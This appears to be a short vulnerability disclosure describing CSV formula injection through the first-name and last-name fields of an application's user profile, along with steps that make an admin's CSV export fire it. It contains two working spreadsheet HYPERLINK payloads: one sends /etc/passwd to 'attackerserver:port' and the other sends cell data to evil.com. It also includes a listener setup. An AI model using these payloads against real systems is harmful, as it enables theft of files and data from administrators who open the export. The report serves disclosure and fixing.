Formula Injection/CSV Injection in “Firstname” & “Lastname” due to Improper Neutralization of Formula Elements in CSV File.
1.Go to a Preferences from the user account and in Personal info of “Firstname” & “Lastname” insert the below payloads.
2.Payloads:-
=HYPERLINK(CONCATENATE(“http://attackerserver:port/a.txt?v=”; (‘file:///etc/passwd’#$passwd.A1)); “poc”)
=HYPERLINK(“http://evil.com?x=“&A3&”,“&B3&”[CR]","Error fetching info: Click me to resolve.”)
4.Start your python server or Netcat listener.
3.Then from admin account go to “System” -> “Users” => “three dot”-> click on “Export Data” and select “CSV” in “Format” -> “Generate export” -> “Download Export”
4.Open the downloaded CSV and click on poc and Error fetching info: Click me to resolve. you will see that attacker able to get /etc/passwd of admin system and also he will get redirected to evil.com.
https://drive.google.com/drive/folders/1IZioPhBSYJaAy8sBw5wvvk_Mtcb9vXZv?usp=sharing